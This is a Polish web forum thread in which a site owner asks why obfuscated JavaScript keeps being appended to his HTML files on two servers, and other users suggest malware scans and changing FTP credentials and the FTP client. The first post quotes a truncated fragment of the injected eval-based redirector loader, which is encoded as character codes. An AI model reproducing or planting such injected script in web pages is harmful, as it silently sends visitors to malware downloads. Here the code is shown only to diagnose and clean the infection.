[Wirus] dodający kod do html

Witam.
Mam pewien problem. Działa sobie pewna stronka www i co jakiś czas jak na nią wchodzę avast wywala mi informację o wirusie. Nazwy wirusów się zmieniają, ostatnio JS:Redirector-NK[Trj].
Wszystkie te wirusy działają w ten sam sposób, tj. rozbudowują plik *.html dopisując za znacznikiem </html> kod w stylu:

<script>aa=([].slice+'vr3').substr(1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ww=window;ss=new String();s=String;12-function(){e=ww.eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=-1*(ddd-d2);n=["4.5k"+"4.5k"+"52.5k"+"51k"+"16k"+"20k"+"50k"+"55.5k"+"49.5k"+"58.5k"+"54.5k"+"50.5k"+"55k"+"58k"+"23k"+"51.5k"+"50.5k"+"58k"+"34.5k"+"54k"+"50.5k"+"54.5k"+"50.5k"+"55k"+"58k"+"57.5k"+"33k"+"60.5k"+"42k"+"48.5k"+"51.5k"+"39k"+"48.5k"+"54.5k"+"50.5k"+"20k"+"19.5k"+"49k"+"55.5k"+"50k"+"60.5k"+"19.5k"+"20.5k"+"45.5k".......

Po rozszyfrowaniu podczas otwierania strony skutkuje to pobieraniem pliku wirusa.

I teraz pytanie..w sumie dwa.

1. Jak to się w ogóle dzieje, że coś jest dopisywane do pliku html? Czy wina leży po mojej stronie czy po stronie serwera na którym są pliki? Stronka jest prosta, zwykłe html + kilka JS, po części darmowych takie jak AC_RunActiveContent.js i lightbox.js. Możliwe że te zewnętrzne skrypty modyfikują stronę? Albo,że mam wirausa u siebie na komputerze (pomimo avasta) któy korzystając z danych programu ftp łączy się i modyfikuje pliki?

2. Jak się zabezpieczyć przed takimi atakami? Zmieniłem atrybuty plików z 644 na 600 czyli odczyt/zapis możliwy tylko dla właściciela ale to nic nie pomogło...

--
pozdrawiam
Michał

Użytkownik Shadovpl edytował ten post 17 01 2012 - 22:32

Na Twoim miejscu odinstalował bym avasta ,i przeskanował system tym http://www.dobreprogramy.pl/Malwarebytes-AntiMalware,Program,Windows,13117.html

Użytkownik Quke edytował ten post 17 01 2012 - 23:05

Znaleziono:

RiskWare.Tool.CK
Backdoor.Sdbot
Malware.Packer.Gen
Trojan.Agent.CK
Trojan.Dropper.PGen
Trojan.WGAPatch
Adware.Onlinegames

No tak...dawno nie było skanowania całości systemu, no i widocznie avast + super anti spyware nie wystarcza.
Czy któryś z powyższych wirusków powoduje opisane przeze mnie objawy?, czy szukać gdzie indziej?

Wina może leżeć po twojej stronie(komputera klienta) bądź na serwerze. Sprawdź prawa dostępu do plików i folderu. Utwórz na swoim kompie plik html i sprawdź co się z nim będzie dziać po jakimś czasie. Jak pojawi się kod injection to mamy winnego - masz jakiegoś rezydenta wirusa w tle.

Swego czasu miałem taką niechlubną sytuację związaną niestety z TotalCommanderem. Bardzo łatwo można było ukraść hasła dostępu do serwera i wtedy stawał się on prawdziwym zombie w rękach sprytnego wirusa co manipulował tym plikiem i protokołem http/ftp. Dlatego zmień hasła dostępu i klienta FTP jakiego używasz.

Pobierz też DrWeb32 jest on skierowany właśnie na takie robaki.

Jak odpowiednio szybko nie zareagujesz to możesz otrzymać od Google brzydkiego filtra z prośbą o usunięcie wirusa z serwera.

Utwórz na swoim kompie plik html i sprawdź co się z nim będzie dziać po jakimś czasie. Jak pojawi się kod injection to mamy winnego - masz jakiegoś rezydenta wirusa w tle.
Swego czasu miałem taką niechlubną sytuację związaną niestety z TotalCommanderem. Bardzo łatwo można było ukraść hasła dostępu do serwera i wtedy stawał się on prawdziwym zombie w rękach sprytnego wirusa co manipulował tym plikiem i protokołem http/ftp. Dlatego zmień hasła dostępu i klienta FTP jakiego używasz.

Pliki html na komputerze pozostają czyste, tylko na serwerze już są złe. No i dodam, że sprawa tyczy się dwóch różnych serwerów. Też używałem ftp via TC.
W każdym razie wyczyściłem system, zmieniłem klienta na WinSCP i zobaczymy co będzie dalej. Powinno się wyjaśnić w przeciągu kilku dni.